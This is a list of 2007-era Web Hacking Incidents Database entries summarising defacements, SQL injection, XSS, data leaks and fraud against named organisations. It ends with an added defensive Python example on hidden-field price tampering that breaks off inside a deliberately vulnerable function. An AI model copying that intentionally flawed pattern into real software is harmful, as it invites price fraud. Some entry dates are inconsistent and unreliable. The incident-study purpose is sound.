Incident Description:

A hacker exploited a leftover admin function on eBay to block users and close sales.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-43: Hacker attacks the Ministry for Housing website as Spanish mortgages come under the international spotlight
WHID ID: 2007-43
Date Occured: 9/3/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Spain
Incident Description:

Yet another defacement, and as usual in the political arena. However, this one is worth a note as the attack is very targeted, while usually such political defacements are carried out quite randomly against sites loosely related to the opponent and usually have little to do with the actual message the attackers want to convey. In this case the defacement seems to be a direct response to the hot debate about housing prices in Spain.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-42: Bank of India seriously compromised
WHID ID: 2007-42
Date Occured: 9/3/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Finance
Attacked Entity Geography: India
Incident Description:

This very serious hacking incident provides insight into a lot of the failures of information security in general and web application security in particular, beyond the simple fact that the web site of the largest state-owned bank in India was invisibly defaced with Trojan-inflicting code.

Firstly, the entire discussion in the references is about the Trojan payload, with no word about the vulnerability that led to the defacement. Actually, a reviewer on the SiteAdvisor report gives the green mark to the web site after the Trojan is removed, without requiring any information about the actual problem.

Secondly, most trust systems, including SiteAdvisor, completely failed to detect the breach, which makes me think about those trust models: they check that the site was not breached, while they should check that the site is not vulnerable. I guess the reason is that their primary goal is to detect intentionally malicious sites and not breaches in normal sites, but others use them to assess the level of security of the latter.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-41: Hackers hit New Zealand Herald website
WHID ID: 2007-41
Date Occured: 9/2/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography:
Incident Description:

Still defacement but this time with a twist. This was a genuine XSS rewriting attack, and was carried out by well known people as a stunt. No information is provided on how the XSS vector found its way to the victim computers.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-40: County's Web site hacked; no data lost
WHID ID: 2007-40
Date Occured: 9/2/2007
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Defacements seem to dominate the list recently, probably because they reach everywhere. Two important conclusions from this particular one are that patch management is a key problem and that it is a problem mainly at government sites across the world.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-39: Hacker sabotages Peru president's Web site
WHID ID: 2007-39
Date Occured: 8/30/2007
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Peru
Incident Description:

Defacements seem to be starting to dominate this list. Alas, they are the most obvious web site hacks out there. While not every defacement is reported in the Web Hacking Incidents Database, key ones are. I included this one since the attacked web site is significant, and since it emphasizes what is becoming a major goal of attacks: politics and international affairs.
As a side note, this incident is also interesting because it was repeated after it was discovered and presumably fixed, which goes a long way to show how much effort protecting web sites takes and how difficult it can be.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-38: Gentoo takes server offline due to security vulnerabilities
WHID ID: 2007-38
Date Occured: 8/30/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Downtime
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description:

This gem is very interesting since it happened on Gentoo servers. It therefore combines the transparency into the incident that only an open source project can offer with the importance and resources of a large one. As a result we have a detailed report about the vulnerability, exploit attempts and even people shouting at each other during the patching process.
What can we learn from this? That no server is secure, and that patching is hard.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-37: United Nations VS SQL Injections
WHID ID: 2007-37
Date Occured: 8/13/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: United Nations
Incident Description:

Defacements are usually beyond the scope of the Web Hacking Incidents Database. We only publish those that stand out, and this one certainly stands out.

The site of the United Nations was broken into and defaced using a pretty basic SQL injection technique, and the referenced article has all the details.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-36: Server hacked through holes in Confixx management software
WHID ID: 2007-36
Date Occured: 8/12/2007
Attack Method: OS Commanding
Application Weakness: Application Misconfiguration
Outcome: Downtime
Attacked Entity Field: Service Providers
Attacked Entity Geography: Germany
Incident Description:

A command injection vulnerability at 1&1, a large German hosting provider, led to denial of service and possible home page modification at 30 servers and up to 1700 web sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Confixx
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-35: Data lapse involved 51,000 at a hospital
WHID ID: 2007-35
Date Occured: 7/30/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Health
Attacked Entity Geography: USA
Incident Description:

In a classic case of lack of proper separation between the production and development sites, an application still under development, lacking proper authentication and authorization, was installed on a hospital's public web site, enabling anyone to query a database of 51,000 names, addresses and social security numbers.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-34: Fox News leaks secret files
WHID ID: 2007-34
Date Occured: 7/25/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

Fox News left non-public files in a directory accessible to everyone on their web server.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-33: THAILAND: ICT Ministry website sabotaged by hacker
WHID ID: 2007-33
Date Occured: 7/22/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Thailand
Incident Description:

While defacements are usually not the bread and butter of this database, when one hits an important government site, especially that of a ministry in charge of information technology, it is worth mentioning.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-32: XSS vulnerability on various German online banking sites
WHID ID: 2007-32
Date Occured: 7/1/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: Germany
Incident Description:

I seldom add disclosures to WHID anymore, even fewer XSS disclosures, but since this time they were discovered in banking sites, I thought it was worth it. After all, too many times people think that application vulnerabilities are found only at less "serious" or less "important" web sites where no real damage can occur.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-31: Hackers Make Off With Personal Info On Applicants At UC Davis
WHID ID: 2007-31
Date Occured: 7/1/2007
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Somebody snitched names, social security numbers and birth dates of approximately 1500 students at the vet school of UC Davis. The indication is that the web application used by the students was at fault. The school's web site described the incident as a result of "the computer attacker being able to manipulate a university computing application to accept unauthorized commands". A disgruntled cow?

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-30: Microsoft UK site defaced
WHID ID: 2007-30
Date Occured: 7/1/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: UK
Incident Description:

Yet another defacement, but with a very high profile target, and a detailed description of the attack which took advantage of an SQL injection vulnerability. The report even includes a video recording of the attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-29: Teen arrested for hacking Belgian police website
WHID ID: 2007-29
Date Occured: 6/26/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: Belgium
Incident Description:

As you may know, defacements usually do not find their way into WHID, especially if the method used is not known. However, since in this case the victim was the Belgian police, I thought it was worth including.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-28: US Embassy probes hacking of online visa appointment system
WHID ID: 2007-28
Date Occured: 6/17/2007
Attack Method: Process Automation
Application Weakness: Insufficient Process Validation
Outcome: Disinformation
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description:

If you live in a country from which you need a visa to get to the States, you knew this would happen. The US online visa appointment system is very open. Indeed, too open. Someone in Jamaica took advantage of this to pre-allocate appointments.


While this might be classified as a business process design flaw, isn't security also about this?

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-27: Files From Google On the Streets
WHID ID: 2007-27
Date Occured: 6/12/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

Google left some files in the wrong place at the wrong time. These files included, surprisingly, database connection strings, including a user name and a password. Hardly news, but this time it is Google.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-26: $1,000,000 CNBC stock trading contest hacked
WHID ID: 2007-26
Date Occured: 6/12/2007
Attack Method: Process Automation
Application Weakness: Insufficient Session Expiration
Outcome: Disinformation
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

The CNBC stock trading reality TV show was even more real than contenders thought it would be. It seems that players learned to cheat the game by opening a browser form to buy a stock before market close and issuing the transaction, at the set price, only after close, when more information was already available.


The interesting anecdote is that the person who discovered the issue used a different, but also questionable, technique: maintaining a very large number of portfolios managed by automated programs, exploiting the fact that the game allowed a user to have any number of portfolios but counted only the best one. Kosher, but stinks.


This story recalls an older story about a predictable delay in a poker game that enabled gamblers to beat the house.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-25: University of Iowa Molecular and Cellular Biology Program Security Incident
WHID ID: 2007-25
Date Occured: 6/12/2007
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Approximately 1100 students' and faculty members' personal information records, which include social security numbers, were exposed by a vulnerable web application at the Molecular and Cellular Biology program at the University of Iowa. The report suggests that the application was actually compromised.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-24: Hackers access personal info on faculty members at Univ. of Virginia
WHID ID: 2007-24
Date Occured: 6/12/2007
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

An undisclosed vulnerability in a web application at the University of Virginia allowed hackers to access names, social security numbers and birth dates of faculty members from May 2005 until April of 2007. Approximately 5700 records were stolen in 54 distinct break-ins.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-23: Office of Nation's Top Spy Inadvertently Reveals Key to Classified National Intel Budget
WHID ID: 2007-23
Date Occured: 6/12/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: USA
Incident Description:

A spreadsheet left on the web site of the US Office of the Director of National Intelligence includes secret information on the total budget of US intelligence. Interestingly, not all the required information appears in the document, but combined with other pieces of information made available earlier, the total number can be calculated.


This is a very interesting example of the sensitivity of partial data or small pieces of information and not just the big secrets.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-22: Hacking of CM's website: Interpol's help sought
WHID ID: 2007-22
Date Occured: 6/12/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description:

The web site of the chief minister of Kerala (an Indian state) was hacked and defaced. The local police have contacted Interpol to help in finding who is behind the web site hacking.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-21: Belgian Defense Ministry site defaced by Turks
WHID ID: 2007-21
Date Occured: 5/17/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: Belgium
Incident Description:

The site of the Belgian Defense Ministry was defaced by Turks who protested pro-Kurdish remarks by the Belgian government.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-20: Pirate Bay breach leaks database
WHID ID: 2007-20
Date Occured: 5/14/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Internet
Attacked Entity Geography: Sweden
Incident Description:

The Pirate Bay is a BitTorrent information exchange blog site. Hackers used an SQL injection vulnerability in the web site to steal 1.6 million user names and passwords of the site. At least the passwords were hashed, which means that the hacker would need cracking software and only the lame passwords would be found.
This incident highlights the Web authentication problem. Just think how many of those users use the same username and password on many other sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-19: Hacker accessed data at University of Missouri
WHID ID: 2007-19
Date Occured: 5/9/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

A report within the help desk system used to track the status of open service calls created a file that was accessible to everyone. A hacker abused the problem to get information regarding 22,000 current and former students.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-18: Microsoft.com defaced
WHID ID: 2007-18
Date Occured: 5/6/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description:

This incredible story from our friends at Zone-H sheds light on one of those defacement attacks, which usually go unexplained. This time an infamous Saudi Arabian hacker abused an SQL injection vulnerability in the Internet Explorer Administration Kit web site. And guess what type of SQL injection: a login form SQL injection!

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Saudi Arabia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-17: Big Brother's big bother
WHID ID: 2007-17
Date Occured: 4/26/2007
Attack Method: Credential/Session Prediction
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: Australia
Incident Description:

The site of "Big Brother", a reality show in Australia, issued duplicate session IDs to different users since the session ID pool was exhausted. Naturally, the second person to get the same session ID got to see all the details of the first one!

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-16: USDA admits data breach, thousands of social security numbers revealed
WHID ID: 2007-16
Date Occured: 4/23/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Details about 63,000 loans granted to farmers by the USDA (the US Department of Agriculture) were posted online by mistake.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-15: High School Hackers Cancel School With Fake Snow Day
WHID ID: 2007-15
Date Occured: 4/5/2007
Attack Method: Brute Force
Application Weakness: Insufficient Authentication
Outcome: Disinformation
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Two girls modified a school's home page by adding a note that school was closed due to a snow storm. The attack was probably done using a rogue admin account.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-14: Your Free MacWorld Expo Platinum Pass
WHID ID: 2007-14
Date Occured: 4/2/2007
Attack Method: Credential/Session Prediction
Application Weakness: Application Misconfiguration
Outcome: Loss of Sales
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description:

A priority code, used to get a free platinum pass to MacWorld Expo, was validated on the client and enabled anyone to get the pass for free. While "grutz" informed the organizers about it, when going over their log files they found out that others had abused the vulnerability without letting anyone know about it.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-13: Hackers hit Georgia Tech and steal personal info
WHID ID: 2007-13
Date Occured: 4/2/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

The personal information of about 3,000 current and former Georgia Tech employees may have been compromised. The information included names, addresses, Social Security numbers and other sensitive information, including about 400 state purchasing card numbers.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-12: SQL injection at knorr.de login page
WHID ID: 2007-12
Date Occured: 4/2/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: Germany
Incident Description:

While vulnerabilities in public web sites are a dime a dozen these days and rarely included in WHID, a classic SQL injection in the login form on the home page of the web site of a very big company is worth an entry. In my presentation I usually claim that such vulnerabilities disappeared years ago and then go on to show advanced SQL injection techniques. It seems that they still exist.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-11: Nokia defaced by XSS
WHID ID: 2007-11
Date Occured: 3/30/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: Canada
Incident Description:

Nokia's Canadian Web Site was defaced using an XSS attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-10: Super Bowl Site Hacked with Trojan, Key logger
WHID ID: 2007-10
Date Occured: 3/30/2007
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Sports
Attacked Entity Geography: USA
Incident Description:

Hackers penetrated the Dolphins stadium web site just days before the Super Bowl was held there and modified the home page to include a Trojan-infecting script.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-09: Former Fruit of the Loom workers' identities compromised
WHID ID: 2007-09
Date Occured: 3/29/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Names and social security numbers of former employees of Fruit of the Loom were available for download from the company's web site.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-08: WordPress Backdoor
WHID ID: 2007-08
Date Occured: 3/29/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A backdoor was planted in a new official release of WordPress, the most popular blogging software in the world. It was available for download for a few days before the backdoor was located.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-07: Westerly Hospital data breach affects 2,000
WHID ID: 2007-07
Date Occured: 3/29/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Health
Attacked Entity Geography: USA
Incident Description:

Personal information about 2,000 patients was mistakenly published on the hospital's web site. The leakage was discovered only when a patient found her information when "Googling" herself.


The information included personal data such as social security numbers, birth dates, address, phone number, insurance numbers and in some cases the reason for the visit.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-06: Hackers swipe seed company's customers' data
WHID ID: 2007-06
Date Occured: 3/29/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

11,500 credit card numbers were stolen from the web site of Johnny's Selected Seeds, a small ($13M in revenue per annum) online vendor of seeds in Maine. 20 of these are known to have been abused. As usual, the hack was discovered because of fraudulent use of the stolen credit cards rather than by the security measures used to protect the web site.


The direct cost of the breach (informing customers, investigating the incident and upgrading the protection of the web site) came to tens of thousands of dollars.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-05: Hacking John McCain
WHID ID: 2007-05
Date Occured: 3/29/2007
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: USA
Incident Description:

An open source developer virtually defaced John McCain's MySpace page. He did not have to commit any crime, because the page pulled an image directly from the open source developer's site.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-04: College glitch avails student information to public
WHID ID: 2007-04
Date Occured: 3/27/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

A student at a community college in Sacramento who was "Googling" himself last month found his name, among 2000 others, in a file accidentally left online by school staff and picked up by Google's crawler.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-03: UI put staff data on Web
WHID ID: 2007-03
Date Occured: 3/26/2007
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Personal information for about 2,700 University of Idaho employees was inadvertently posted at the school's Web site for 19 days in February, though officials say it was not easy to access and there's no reason yet to believe it was misused.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-01: Credit Card Information stolen from Indiana's Web Site
WHID ID: 2007-01
Date Occured: 3/26/2007
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

On January 3, a hacker broke into Indiana's government web site and made off with personal information for 71,000 health care aides who obtained certifications from the state, as well as 5,600 credit card numbers from people who had paid the state through the IN.gov web site.

While officials in Indiana tried to write it off as a harmless prank played by a teenager, the U.S. Department of Justice has also been investigating the case, and they believe the same hacker is responsible for attempts on other state government web sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-48: SQL Injection Used to Steal Information from "Life is Good"
WHID ID: 2006-48
Date Occured: 1/19/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Update (Jan 26th 2009) - an SC Magazine article sheds more light on the incident, revealing that there was actually a breach, apparently using SQL injection, which resulted in the leakage of 10,000 credit card numbers.


An SQL injection vulnerability that could result in a hacker being able to access credit card numbers, expiration dates, and security codes of thousands of consumers was discovered in the web site of retailer "life is good".

The US Federal Trade Commission charged "life is good" with lack of reasonable and appropriate security for the sensitive consumer information stored on its servers. The company's settlement with the Commission requires it to adopt a very comprehensive and costly security program going forward.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-47: Santa brought to Zone-H a brand new defacement
WHID ID: 2006-47
Date Occured: 4/2/2007
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Zone-h is one of the best (well, the best, not just one of them) web sites to follow if you are interested in what the bad guys do. Their account of how their own web site was defaced is a classic. And no, it was not their fault. The incident shows how a seemingly minor vulnerability in a major web site (a Hotmail XSS bug) can be used to deface another, unrelated site in a very elaborate and targeted attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-46: Hacker Redirects Bank Customers To Phony Site
WHID ID: 2006-46
Date Occured: 3/30/2007
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Phishing
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A small credit union web site was hacked and its traffic redirected to a pharming site. About 180 users were redirected, of whom 12 were tricked into providing their personal information to the attackers. $500 is known to have been stolen from one of the victims.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2006-45: Man arrested for hacking Internet shopping malls
WHID ID: 2006-45
Date Occured: 3/30/2007
Attack Method: Hidden Parameter Manipulation
Application Weakness: Insufficient Process Validation
Outcome: Monetary Loss
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

A Korean shopping system was vulnerable to hidden field manipulation, and a determined hacker purchased $6,000 worth of merchandise at 45 stores for much less than its price.
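
The entry gives no detail beyond "hidden field manipulation", so the following is an added example rather than code from the incident or from the affected shopping system. It shows the weakness in its usual form, a price carried in a hidden form field and trusted by the checkout, beside two fixes: re-pricing every line from the server's own catalogue, and, where state really has to round-trip through the client, binding it to an HMAC so tampering is detected. The catalogue, the order, the `SIGNING_KEY` and the tampered form are all constructed for the demonstration.

```python
import hmac
import hashlib
import json
from decimal import Decimal

# Constructed catalogue: the server's price list is the only source of truth.
CATALOG = {"SKU-1001": Decimal("120.00"), "SKU-2002": Decimal("45.50")}

# Assumption for the example: a server-side secret that never reaches the client.
SIGNING_KEY = b"demo-key-replace-in-production"


def total_vulnerable(form):
    """Trusts the price carried in the hidden form field (the flaw in this incident)."""
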